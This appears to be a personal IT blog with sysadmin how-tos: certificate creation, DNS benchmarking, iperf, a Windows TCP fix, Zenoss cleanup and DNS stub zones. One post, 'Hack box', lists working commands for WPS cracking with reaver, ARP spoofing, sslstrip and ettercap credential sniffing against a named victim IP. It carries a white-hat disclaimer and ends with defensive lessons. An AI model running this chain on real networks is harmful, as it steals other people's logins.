Create a strong self-signed certificate for multiple years

If you follow these steps you can create a self signed certificate with the following specifications:

  • Wildcard certificate
  • SHA256 hash
  • 10 years
  • 2048 bits public key
  • Client and server verification
  • Sha1 fingerprint

Be aware that self-signed certificates can manipulate by a man-in-the-middle. You should not use this in critical production environments.

Please use windows 10 powershell in admin mode. Otherwise you will get errors

New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname *.domain.local -NotBefore $([datetime]::now.AddDays(-15)) -NotAfter $([datetime]::now.AddDays(3560))

Now export the certificates. Before you copy/paste change the thumbprint with the thumbprint you get from the above command.

$CertPassword = ConvertTo-SecureString -String "YourPassword" -Force –AsPlainText
Export-PfxCertificate -Cert cert:\LocalMachine\My\C6B46CEB7D3A40DB08E78B19FEDD3A24EA7A7919  -FilePath C:\test.pfx -Password $CertPassword
Export-Certificate -Cert Cert:\LocalMachine\My\C6B46CEB7D3A40DB08E78B19FEDD3A24EA7A7919 -FilePath C:\tstcert.cer

Now you can import the PFX with IIS and bind the certificate in IIS.
And import the *.CER in your MMC > Certificates > Computer account > trusted root Certification authority > Certificates

Have fun with your certificate the next 10 years 😀

command-prompt-powershell

Inspiration

Convert PFX to PEM and upload the certificate to Plesk

Export the Private Key:

# openssl pkcs12 -in filename.pfx -nocerts -out key.pem

Remove the password from the SSL certificate (unencrypted is needed for plesk):

# openssl rsa -in key.pem -out server.key

Export the certificate:

# openssl pkcs12 -in filename.pfx -clcerts -nokeys -out cert.pem

Now upload the certificate:

ssl-thawte

And bind the certificate in your hosting settings:

SSL-PII

Find your fastest DNS server

There is a nice cross-platform open source tool to find out what the best DNS server is for your internet connection.

  1. Go to https://code.google.com/p/namebench/downloads/list
  2. Download the namebench tool
  3. Extract and start the tool
  4. Click on “Start Benchmark

2015-08-19 23_40_10-namebench

This benchmark takes some time. About +/- 15 minutes. Then you get the results in your browser:

DNS-Namebench1

DNS-Namebench2

201% faster name query performance!!! WOW!

When everything is setup you can check your DNS settings with a nice website: https://www.dnsleaktest.com/

2015_08_19_23_34_48_Store

To find the best DNS server for you start the tool at different times during the day.

Happy resolving 🙂

Build your own speedtest with iperf

When you have network performance issue’s you often use speed test websites to check the network bandwidth. But mostly of the time you want to monitor the network bandwidth between two specific servers. There is a cross platform speed test utility you can use to monitor the bandwidth. The name of the tool is iperf

How it works:

  • Download the tool: http://iperf.fr/
  • Extract the tool in a folder and jump to the folder with the command line
  • start the tool on the server with this command: iperf -s

iperf server

  • Start the tool on the remote client iperf -c IPSERVER -r
  • The tool first try an upload from the client and then a download from the client

iperf client

If you have any connection problems with iperf try temporary turn of you firewall on both server and client. You can also play with different window sizes with the iperf -c IPSERVER -r -w 40000

For a lot of tips and tricks (even a graphical interface called jperf) check: http://openmaniak.com/iperf.php

Happy troubleshooting 😀

Windows 2012 R2 unstable internet connection

I had 2x HP DL 380 G6 servers with Windows 2012 R2 whit the same problem. When I start a download (I try a lot of different sites) the download drops and fluctuate. When I connect my laptop or another server on the same cable the download is stable. So my conclusion was the onboard nic.

What I tried:

  • Update latest HP SSP (2014_2)
  • Update firmware NIC
  • Update driver NIC
  • Update Windows (patches)
  • change all the default nic settings like disable tcp offload for example
  • Try another switch

Bandwidth during download:

hp ethernet

I thought the problem must be the NIC so I added an intel pro to my server with the same result 🙁

Then I found the command netsh interface tcp show global

Output:

C:\Windows\system32>netsh interface tcp show global
Querying active state...

TCP Global Parameters
----------------------------------------------
Receive-Side Scaling State          : enabled
Chimney Offload State               : disabled
NetDMA State                        : disabled
Direct Cache Access (DCA)           : disabled
Receive Window Auto-Tuning Level    : enabled
Add-On Congestion Control Provider  : none
ECN Capability                      : enabled
RFC 1323 Timestamps                 : disabled
Initial RTO                         : 3000
Receive Segment Coalescing State    : enabled
Non Sack Rtt Resiliency             : disabled
Max SYN Retransmissions             : 2

I dived in to these settings and I found the “Receive Window Auto-Tuning Level on enabled”. So I disabled the setting with:

netsh int tcp set global autotuninglevel=disabled

After that setting the network connection to the internet was stable 🙂

fixed

I found an article on the net that Cisco PIX IOS 8.0 doesn’t support “TCP Window Scaling”. Source: http://www.cisco.com/c/en/us/support/docs/security/ios-firewall/71613-iosfw-tcp-scaling-ts.html

So I use the workaround to disable the Automatic Windows Scaling in Windows because I can’t update our old PIX.

Problem solved 😀

 

Zenoss: Performance issues with too many events

When you have too many events in your zenoss environment the zenoss webinterface will be very sloooooooow. And you get all kind of errors:

  • Script don’t respond
  • Connection refused. Check zeneventserver status on deamons
  • A zenoss error has occurred

When you start top you see alot of java executables when you click on the Infrastructure zenoss button. Java sometimes take 350% CPU.

java -Djetty.host=localhost -server -XX:+HeapDumpOnOutOfMemoryError -DZENOSS_COMMAND=zeneventserver -DZENHOME=/opt/zenoss -Djetty.home=/opt/zenoss -Djetty.logs=/opt/zenoss/log -Dlogback.configurationFile=/opt/zenoss/etc/zeneventserver/logback.xml -Xmx1024m -DZENOSS_DAEMON=y -jar /opt/zenoss/lib/jetty-start-7.5.3.v20111011.jar --config=/opt/zenoss/etc/zeneventserver/jetty/start.config --ini=/opt/zenoss/etc/zeneventserver/jetty/jetty.ini --pre=etc/zeneventserver/jetty/jetty-logging.xml

I’ve read a lot of zenoss documentation on the internet but didn’t   found a nice article to get rid of all the events. So here is an article how I fixed it.

Basic steps:

  1. Backup Zenoss
  2. Stop zenoss
  3. Create a new zeneventserver database
  4. Remove zeneventserver content
  5. Restore the zenoss backup
  6. Start zenoss
  7. Enjoy your fast zenoss 🙂

Detailed steps:

  • ssh zenoss host
  • Switch zenoss user

# su zenoss

  • Create backup:

$ /opt/zenoss/bin/zenbackup -v10

  • Stop Zenoss service

$ zenoss stop

  • edit  the zeneventserver script

nano /opt/zenoss/bin/zeneventserver-create-db

  • Search for root and add the root password

root-password

  • Run the script

$ zeneventserver-create-db --force --dbtype=mysql

  • Clear the zeneventserver folder

rm -rf $ZENHOME/var/zeneventserver/*

Now some tricky part. Zenoss change some MySQL passwords when you do a restore.  This result in a access denied for user zenoss@localhost during a restore. There is a fix for this problem. Reset the zenoss@’localhost’ and zenoss@’%’ MySQL passwords before you do a restore.

First get the current mysql from the global.conf file (yellow). This password is the password you need for the restore.

$nano /opt/zenoss/etc/global.conf

global.conf

Tip: Too check the password (encrypted). You can do the same after you change the password:

$ mysql -uroot -p
mysql> select * from mysql.user;

mysql-encrypted

Now reset the password

SET PASSWORD FOR 'zenoss'@'localhost' = PASSWORD('BEagPxxxxxxxxxxxxxxx');
SET PASSWORD FOR 'zenoss'@'%' = PASSWORD('BEagPxxxxxxxxxxxxxxx');

When you check the permissions now you see another encryption:

$ mysql -uroot -p
mysql> select * from mysql.user;

(I don’t have an image example because this is an production enviroment)

Optional: To check the zenoss user permissions:

mysql> SELECT user, host, db, select_priv, insert_priv, grant_priv FROM mysql.db;

mysql-permissions

Optional: When you still have errors or the above rights ain’t good try these two MySQL scripts:

mysql> CREATE USER 'zenoss'@'%' IDENTIFIED BY 'some_pass';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'zenoss'@'localhost'
-> WITH GRANT OPTION;

mysql> CREATE USER 'zenoss'@'%' IDENTIFIED BY 'some_pass';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'zenoss'@'localhost'
-> WITH GRANT OPTION;

Ok, now everting is set do a restore. The -v stands for verbose and with the no-eventsdb you don’t restore all the events. That’s exactly what we want

zenrestore --file=/opt/zenoss/backups/zenbackup_2014013 -v --no-eventsdb

Now start zenoss

$zenoss start

That’s it.  Enjoy the performance and set some parameters that your events ain’t that big any more in the future.

Source: http://www.nickyeates.com/technology/zenoss/useful_commands_zenoss4
Source: http://community.zenoss.org/docs/DOC-3048

My Raspberry Pi Project: Hack box

Finally I found a nice project for my Raspberry PI 🙂 I’ll write down some notes in this post to make it easier to find back some linux commands. Please use this documentation only as a white hat hacker and for learning purposes only!!!!

First:

To break in a WPS compatible wireless access point:

  • airmon-ng start wlan0
  • wireless-overview
  • reaver -i mon0 -b 64:27:37:50:02:77 -c 5 -vv
  • After +/- 10 hours you have the PSK

Now configure the wireless with your credentials

  • airmon-ng stop wlan0
  • nano /etc/network/interfaces
  • Original file:
auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet manual
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
  • New file:
auto lo

iface lo inet loopback
iface eth0 inet dhcp
iface wlan0 inet dhcp
wpa-ssid "L0g0ff"
wpa-psk "SomePassword"
allow-hotplug wlan0
iface wlan0 inet dhcp
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
  • Now bring up the wireless card: ifup wlan0

Now the wireless setup is done we make our PI an IP forwarding server. So that we can do man in the middle attacks.

  • nano /proc/sys/net/ipv4/ip_forward change the 0 to 1
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666 

    (needed to forward all HTTP traffic to SSLStrip)

  • sslstrip -l 666 (do not close this terminal)

Now the proxy is running we want to ARP spoof so that we can redirect all traffic to our PI

  • arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1 (where 1.12 is our victim and 1.1 our gateway) (do not close ths terminal)
  • You can also spoof the entire network with arpspoof -i wlan0 192.168.1.1, but if your PI cannot handle all traffic you will DoS your network.

And now all things are set the sniffing can begin 🙂

  • ettercap -m ettercap.log -Tq -i wlan0 (don’t close the terminal)

The only thing left now is wait that the victim is going to log in a website and the username and password will write in to the ettercap.log file. With the command cat ettercap.log |grep USER you can see all the login credentials.

What did we learn?

  1. Never login to a website without https
  2. Never login to a website with https errors
  3. Always disable WPS on your router
  4. On company wireless sites always use a DMZ

Sources:
http://www.ikwashetniet.blogspot.nl/2012/01/wps-van-handig-hulpmiddel-naar-gapend.html
http://www.hackavision.com/2011/07/sniffing-passwords-over-wifi-connection.html

Stub zone easy explained

The difference between stub zone and secondary DNS zones…  It all relates to replication, efficiency and availability.

Think of it like this:
There are two cities, London and Manchester.
London has 100 people, each with a book full of information (so 100 books in total).
You are in Manchester and you want to be able to have access to the information in these “books”.

There are two ways to do this as follows:
a) Another 100 people appear in London, they each make a copy of a book, and they each take their own car in order to drive to Manchester to meet you and give you the books. This causes a traffic jam due to the high number of people driving on the highway.

The above is secondary zone replication.

b) Instead of the above, you received the address of the 100 people in London. You need information in one of the books. You decide to take your car, and you drive to the address. You found the information you need, and you drive back to Manchester.

This example is a stub zone.

So think about it for a second.
In example A, the information is stored twice, both in London and Manchester, but the information requires a big highway to transport those 100 people, each in their individual cars, to your office in Manchester. Do you have a big enough highway to support this many people?
In example B, you don’t need such a big highway because a massive number of people are not clogging the highway, each trying to bring a book to you, but instead you decide to go back to London to find the book you need.

So what do we gather from this?
In example A, you need a large highway (lots of bandwidth) to get the books from London to Manchester. But once the information is in Manchester, you can very quickly find the book you need.
In example B, you don’t need a large highway to find the book in London, but you do need a RELIABLE highway. If this highway is closed, how do you get the book? And remember, since the books are not in Manchester, it will take longer for you to get the book (since you need to drive back and forth for it).

Hope this helps, first thing that came to my mind.

Thanks to Shinigami